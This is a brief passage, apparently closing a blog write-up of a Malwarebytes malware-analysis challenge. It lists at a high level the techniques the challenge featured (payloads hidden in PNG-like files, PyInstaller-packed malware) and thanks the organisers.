  • Concealed malware downloading, using « harmless » formats (like PNG) to hide an executable payload from basic traffic analysis;
  • PyInstaller-based malware (yes, sometimes malware writers can be lazy).

Thanks to Malwarebytes for this entertaining challenge!
